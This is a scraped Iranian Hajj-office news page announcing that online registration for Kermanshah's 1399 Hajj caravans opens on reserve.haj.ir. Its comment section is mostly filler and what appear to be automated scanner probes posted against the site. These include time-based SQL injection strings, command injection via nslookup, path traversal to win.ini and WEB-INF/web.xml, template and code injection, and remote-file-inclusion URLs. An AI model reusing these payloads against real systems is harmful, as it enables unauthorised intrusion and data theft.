دات نت نیوک
X
سامانه های سازمانی
Saturday 23 January 2021  |   | Login

اطلاعیه ثبت نام در کاروانهای حج تمتع سال 99 حج و زیارت استان کرمانشاه

  • 29 February 2020
  • 08:57
  • حج تمتع
  • 652 دیدگاه
  • 481 بازدید
  • Article Rating
اطلاعیه ثبت نام در کاروانهای حج تمتع سال 99 حج و زیارت استان کرمانشاه

" ثبت نام اینترنتی در کاروان های حج 1399 استان کرمانشاه از ساعت 10 صبح روز جمعه 9 اسفندماه 1398 در سامانه https:‏/‏/reserve.haj.ir آغاز خواهد شد. 

متن اطلاعیه و اسامی کاروانها و آدرس به پیوست خبر می باشد.

مدیر سایت امتیاز به خبر :

عکسهای مرتبط

ارسال نظرات

Name (required)

Email (required)

Website

نظرات شما

djbmixir
djbmixir Monday, March 30, 2020 16:40
1
ftlblymn
ftlblymn Monday, March 30, 2020 17:03
1
ftlblymn
ftlblymn Monday, March 30, 2020 17:04
1
djbmixir
djbmixir Monday, March 30, 2020 17:15
1
ftlblymn
ftlblymn Monday, March 30, 2020 18:11
1
ftlblymn
ftlblymn Monday, March 30, 2020 18:13
1
djbmixir
djbmixir Monday, March 30, 2020 18:37
1
djbmixir
djbmixir Monday, March 30, 2020 18:38
1
ftlblymn
ftlblymn Monday, March 30, 2020 20:33
1
ftlblymn
ftlblymn Monday, March 30, 2020 20:34
1
ftlblymn
ftlblymn Monday, March 30, 2020 20:37
1
ftlblymn
ftlblymn Monday, March 30, 2020 20:39
1
djbmixir
djbmixir Monday, March 30, 2020 21:28
1
tjyobjbk
tjyobjbk Monday, March 30, 2020 21:29
1
djbmixir
djbmixir Monday, March 30, 2020 21:31
1
aeglhnho
aeglhnho Monday, March 30, 2020 21:32
1
ftlblymn
ftlblymn Tuesday, March 31, 2020 01:19
1
ftlblymn
ftlblymn Tuesday, March 31, 2020 01:20
1
ftlblymn
ftlblymn Tuesday, March 31, 2020 01:21
1
ftlblymn
ftlblymn Tuesday, March 31, 2020 01:22
1
ftlblymn
ftlblymn Tuesday, March 31, 2020 01:26
1
ftlblymn
ftlblymn Tuesday, March 31, 2020 01:27
1
djbmixir
djbmixir Tuesday, March 31, 2020 03:08
1
djbmixir
djbmixir Tuesday, March 31, 2020 03:09
1
tjyobjbk
tjyobjbk Tuesday, March 31, 2020 03:10
1
tjyobjbk
tjyobjbk Tuesday, March 31, 2020 03:11
1
tjyobjbk
tjyobjbk Tuesday, March 31, 2020 03:12
1
aeglhnho
aeglhnho Tuesday, March 31, 2020 03:14
1
aeglhnho
aeglhnho Tuesday, March 31, 2020 03:15
1
uyivarpm
uyivarpm Tuesday, March 31, 2020 03:17
1
fjxqtghg
fjxqtghg Friday, April 03, 2020 00:52
1
eevxksjh
eevxksjh Friday, April 03, 2020 00:54
1
eevxksjh
eevxksjh Friday, April 03, 2020 00:55
1
qifvigjx
qifvigjx Friday, April 03, 2020 01:01
1
qifvigjx
qifvigjx Friday, April 03, 2020 01:02
1
gsenhhme
gsenhhme Friday, April 03, 2020 01:05
1
dmjupfds
dmjupfds Friday, April 03, 2020 01:11
1
dmjupfds
dmjupfds Friday, April 03, 2020 01:12
1
dmjupfds
dmjupfds Friday, April 03, 2020 01:13
1
dsttcqyc
dsttcqyc Friday, April 03, 2020 01:16
1
jdvbceen
jdvbceen Friday, April 03, 2020 01:22
1
qkxgmomp
qkxgmomp Friday, April 03, 2020 01:24
1
revoicta
revoicta Friday, April 03, 2020 01:34
1
ristxobq
ristxobq Friday, April 03, 2020 01:37
1
ristxobq
ristxobq Friday, April 03, 2020 01:38
1
ggjsslcs
ggjsslcs Friday, April 03, 2020 01:44
1
dvblqywh
dvblqywh Friday, April 03, 2020 01:50
1
dkuivjxy
dkuivjxy Friday, April 03, 2020 01:51
1
cqmpteya
cqmpteya Friday, April 03, 2020 01:54
1
rncptcpu
rncptcpu Friday, April 03, 2020 01:58
1
gdrqlngc
gdrqlngc Friday, April 03, 2020 02:03
1
odmrrkii
odmrrkii Friday, April 03, 2020 02:08
1
odmrrkii
odmrrkii Friday, April 03, 2020 02:09
1
utducauh
utducauh Saturday, April 04, 2020 00:27
1
ycvvtclb
ycvvtclb Saturday, April 04, 2020 00:28
1
qisxjuth
qisxjuth Saturday, April 04, 2020 00:29
1
ycvvtclb
ycvvtclb Saturday, April 04, 2020 00:30
1
ugvdoaew
ugvdoaew Saturday, April 04, 2020 00:34
1
wjnyguxt
wjnyguxt Saturday, April 04, 2020 00:36
1
wjnyguxt
wjnyguxt Saturday, April 04, 2020 00:37
1
wjnyguxt
wjnyguxt Saturday, April 04, 2020 00:38
1
hgqaenut
hgqaenut Saturday, April 04, 2020 00:39
1
wjnyguxt
wjnyguxt Saturday, April 04, 2020 00:40
1
cjopaxns
cjopaxns Saturday, April 04, 2020 00:46
1
evedyiyu
evedyiyu Saturday, April 04, 2020 00:47
1
yaeyigui
yaeyigui Saturday, April 04, 2020 00:49
1
tsrticqf
tsrticqf Saturday, April 04, 2020 00:57
1
nwijtncs
nwijtncs Saturday, April 04, 2020 01:00
1
nwijtncs
nwijtncs Saturday, April 04, 2020 01:01
1
nfjltlpo
nfjltlpo Saturday, April 04, 2020 01:06
1
jplfvakn
jplfvakn Saturday, April 04, 2020 01:09
1
qiospadl
qiospadl Saturday, April 04, 2020 01:12
1
vsctfpcg
vsctfpcg Saturday, April 04, 2020 01:18
1
vsctfpcg
vsctfpcg Saturday, April 04, 2020 01:19
1
tsrticqf
tsrticqf Saturday, April 04, 2020 01:53
1
swsqmvla
swsqmvla Sunday, April 05, 2020 16:53
1
swsqmvla
swsqmvla Sunday, April 05, 2020 16:54
1
swsqmvla
swsqmvla Sunday, April 05, 2020 16:55
1
swsqmvla
swsqmvla Sunday, April 05, 2020 16:56
response.write(9939325*9820618)
swsqmvla
swsqmvla Sunday, April 05, 2020 16:56
'+response.write(9939325*9820618)+'
swsqmvla
swsqmvla Sunday, April 05, 2020 16:56
"+response.write(9939325*9820618)+"
swsqmvla
swsqmvla Sunday, April 05, 2020 16:56
response.write(9649516*9318027)
swsqmvla
swsqmvla Sunday, April 05, 2020 16:56
'+response.write(9649516*9318027)+'
swsqmvla
swsqmvla Sunday, April 05, 2020 16:56
"+response.write(9649516*9318027)+"
swsqmvla
swsqmvla Sunday, April 05, 2020 16:56
response.write(9491626*9057829)
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 16:57
1
swsqmvla
swsqmvla Sunday, April 05, 2020 16:57
'+response.write(9491626*9057829)+'
swsqmvla
swsqmvla Sunday, April 05, 2020 16:57
"+response.write(9491626*9057829)+"
swsqmvla
swsqmvla Sunday, April 05, 2020 16:57
response.write(9493403*9539408)
swsqmvla
swsqmvla Sunday, April 05, 2020 16:57
'+response.write(9493403*9539408)+'
swsqmvla
swsqmvla Sunday, April 05, 2020 16:57
"+response.write(9493403*9539408)+"
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 16:58
1
wwbwjdht
wwbwjdht Sunday, April 05, 2020 16:59
1
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:00
1
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:01
1
swsqmvla
swsqmvla Sunday, April 05, 2020 17:02
1
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:02
set|set&set
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:02
$(nslookup jZf9FFJQ)
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:02
&nslookup abK73rcy&'\"`0&nslookup abK73rcy&`'
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:03
$(nslookup Lm6S7vql)
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:03
&nslookup rS89iFEU&'\"`0&nslookup rS89iFEU&`'
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:03
$(nslookup pTrhleAV)
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:03
&nslookup nMehLIbe&'\"`0&nslookup nMehLIbe&`'
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:03
$(nslookup mBvIdmAY)
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:03
&nslookup 4iDramEJ&'\"`0&nslookup 4iDramEJ&`'
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:03
1
swsqmvla
swsqmvla Sunday, April 05, 2020 17:05
1
swsqmvla
swsqmvla Sunday, April 05, 2020 17:06
1
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:07
1
swsqmvla
swsqmvla Sunday, April 05, 2020 17:08
1
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:09
1
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:10
1
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:11
1
sjkkedth
sjkkedth Sunday, April 05, 2020 17:11
i2GZE00K
sjkkedth
sjkkedth Sunday, April 05, 2020 17:11
WLKAXHmK
sjkkedth
sjkkedth Sunday, April 05, 2020 17:11
1MNOj0OR
sjkkedth
sjkkedth Sunday, April 05, 2020 17:12
IKlQOUbI
swsqmvla
swsqmvla Sunday, April 05, 2020 17:12
1
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:13
1
sjkkedth
sjkkedth Sunday, April 05, 2020 17:14
1
vsbarfdx
vsbarfdx Sunday, April 05, 2020 17:15
1
sjkkedth
sjkkedth Sunday, April 05, 2020 17:16
1
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
dX8ILZNM
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
-1 OR 2+586-586-1=0+0+0+1 --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
-1 OR 2+386-386-1=0+0+0+1
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
-1' OR 2+396-396-1=0+0+0+1 --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
-1' OR 2+19-19-1=0+0+0+1 or '9OiASYj5'='
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
-1" OR 2+748-748-1=0+0+0+1 --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
if(now()=sysdate(),sleep(12),0)/*'XOR(if(now()=sysdate(),sleep(12),0))OR'"XOR(if(now()=sysdate(),sleep(12),0))OR"*/
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
-1; waitfor delay '0:0:18' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
-1); waitfor delay '0:0:18' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
-1)); waitfor delay '0:0:18' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
1 waitfor delay '0:0:18' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
8wkJvNau'; waitfor delay '0:0:18' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
dcBSY4p1'); waitfor delay '0:0:18' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
TuaC0gsU')); waitfor delay '0:0:6' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
-1;select pg_sleep(6); --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
-1);select pg_sleep(6); --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
-1));select pg_sleep(6); --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
JjMeOICV';select pg_sleep(6); --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
moVe55Yf');select pg_sleep(6); --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:17
Zo8XnnTD'));select pg_sleep(12); --
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:17
1
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:18
1
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:19
AK7sHErm
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:19
-1 OR 2+942-942-1=0+0+0+1 --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:19
-1 OR 2+163-163-1=0+0+0+1
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:19
-1' OR 2+732-732-1=0+0+0+1 --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:19
-1' OR 2+797-797-1=0+0+0+1 or 'xhUSPdoE'='
bgnqjnvy
bgnqjnvy Sunday, April 05, 2020 17:19
1
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:19
-1" OR 2+542-542-1=0+0+0+1 --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:19
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:19
(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
vsbarfdx
vsbarfdx Sunday, April 05, 2020 17:20
12345'"\'\");|[*%00{%0d%0a<%00>%bf%27'💩]
bgnqjnvy
bgnqjnvy Sunday, April 05, 2020 17:20
${10000234+10000139}
bgnqjnvy
bgnqjnvy Sunday, April 05, 2020 17:20
${9999845+9999829}
bgnqjnvy
bgnqjnvy Sunday, April 05, 2020 17:20
${9999975+10000411}
bgnqjnvy
bgnqjnvy Sunday, April 05, 2020 17:20
${9999129+9999608}
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:20
-1); waitfor delay '0:0:18' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:20
-1)); waitfor delay '0:0:18' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:20
1 waitfor delay '0:0:18' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:20
70GHBhyl'; waitfor delay '0:0:18' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:20
sqh6g8WT'); waitfor delay '0:0:18' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:20
pGAkxVWl')); waitfor delay '0:0:27' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:20
-1;select pg_sleep(27); --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:20
-1; waitfor delay '0:0:0' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:20
-1);select pg_sleep(27); --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:20
-1));select pg_sleep(27); --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:20
-1; waitfor delay '0:0:18' --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:20
kxI1XxDl';select pg_sleep(27); --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:20
6LRLESte');select pg_sleep(27); --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:21
wE8t9P3z'));select pg_sleep(9); --
wwbwjdht
wwbwjdht Sunday, April 05, 2020 17:21
1
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:21
-1 OR 2+942-942-1=0+0+0+1 --
${9999697+9999851}
${9999697+9999851} Sunday, April 05, 2020 17:22
1
vsbarfdx
vsbarfdx Sunday, April 05, 2020 17:22
12345'"\'\");|[*%00{%0d%0a<%00>%bf%27'💩]
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:22
e7XFI0PT
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:22
-1 OR 2+166-166-1=0+0+0+1 --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:22
-1 OR 2+116-116-1=0+0+0+1
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:22
-1' OR 2+30-30-1=0+0+0+1 --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:23
-1' OR 2+166-166-1=0+0+0+1 or 'XcvOcbqm'='
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:23
-1" OR 2+241-241-1=0+0+0+1 --
nrswrjco
nrswrjco Sunday, April 05, 2020 17:23
1
vsbarfdx
vsbarfdx Sunday, April 05, 2020 17:23
12345'"\'\");|[*%00{%0d%0a<%00>%bf%27'💩]
vsbarfdx
vsbarfdx Sunday, April 05, 2020 17:24
1
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:24
NPManKNH
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:24
-1 OR 2+628-628-1=0+0+0+1 --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:24
-1 OR 2+104-104-1=0+0+0+1
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:24
-1' OR 2+165-165-1=0+0+0+1 --
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:24
-1' OR 2+829-829-1=0+0+0+1 or 'Me9YDIW5'='
ahnlhcqw
ahnlhcqw Sunday, April 05, 2020 17:24
-1" OR 2+451-451-1=0+0+0+1 --
bgnqjnvy
bgnqjnvy Sunday, April 05, 2020 17:25
1
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:26
1
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:27
1
nrswrjco
nrswrjco Sunday, April 05, 2020 17:28
1
c2pJZEplajQ=
c2pJZEplajQ= Sunday, April 05, 2020 17:29
1
nrswrjco
nrswrjco Sunday, April 05, 2020 17:30
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
nrswrjco
nrswrjco Sunday, April 05, 2020 17:30
1some_inexistent_file_with_long_name%00.jpg
nrswrjco
nrswrjco Sunday, April 05, 2020 17:30
Http://testasp.vulnweb.com/t/fit.txt
nrswrjco
nrswrjco Sunday, April 05, 2020 17:30
http://testasp.vulnweb.com/t/fit.txt%3F.jpg
nrswrjco
nrswrjco Sunday, April 05, 2020 17:30
testasp.vulnweb.com
wsekyogo
wsekyogo Sunday, April 05, 2020 17:30
1
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:31
1
nrswrjco
nrswrjco Sunday, April 05, 2020 17:32
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
nrswrjco
nrswrjco Sunday, April 05, 2020 17:32
1some_inexistent_file_with_long_name%00.jpg
nrswrjco
nrswrjco Sunday, April 05, 2020 17:32
Http://testasp.vulnweb.com/t/fit.txt
nrswrjco
nrswrjco Sunday, April 05, 2020 17:32
http://testasp.vulnweb.com/t/fit.txt%3F.jpg
nrswrjco
nrswrjco Sunday, April 05, 2020 17:32
testasp.vulnweb.com
wsekyogo
wsekyogo Sunday, April 05, 2020 17:33
1
rudjqjsq
rudjqjsq Sunday, April 05, 2020 17:46
1
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:46
../../../../../../../../../../windows/win.ini
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:46
../../../../../../../../../../boot.ini
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:46
../../../../../../../../../../windows/win.ini%00.jpg
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:46
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:46
................windowswin.ini
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:46
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:46
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:46
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:46
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:46
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:46
WEB-INF/web.xml
jxtvkliy
jxtvkliy Sunday, April 05, 2020 17:46
WEB-INF\web.xml
wsekyogo
wsekyogo Sunday, April 05, 2020 17:47
1
ftlblymn
ftlblymn Sunday, April 05, 2020 18:07
1
ftlblymn
ftlblymn Sunday, April 05, 2020 18:07
&nslookup VITmhxbG&'\"`0&nslookup VITmhxbG&`'
ftlblymn
ftlblymn Sunday, April 05, 2020 18:07
'"()
http://testasp.vulnweb.com/t/xss.html?%00.jpg
http://testasp.vulnweb.com/t/xss.html?%00.jpg Sunday, April 05, 2020 18:08
1
ftlblymn
ftlblymn Sunday, April 05, 2020 18:14
1
ftlblymn
ftlblymn Sunday, April 05, 2020 18:31
1
ftlblymn
ftlblymn Sunday, April 05, 2020 18:32
WEB-INF/web.xml
ftlblymn
ftlblymn Sunday, April 05, 2020 18:32
-1); waitfor delay '0:0:6' --
ftlblymn
ftlblymn Sunday, April 05, 2020 18:32
3cwGdqC2'); waitfor delay '0:0:27' --
ftlblymn
ftlblymn Sunday, April 05, 2020 18:32
${@print(md5(acunetix_wvs_security_test))}
ftlblymn
ftlblymn Sunday, April 05, 2020 18:32
1'"
ftlblymn
ftlblymn Sunday, April 05, 2020 18:32
1
ftlblymn
ftlblymn Sunday, April 05, 2020 18:33
1
djbmixir
djbmixir Sunday, April 05, 2020 18:45
1
djbmixir
djbmixir Sunday, April 05, 2020 18:46
http://testasp.vulnweb.com/t/fit.txt%3F.jpg
djbmixir
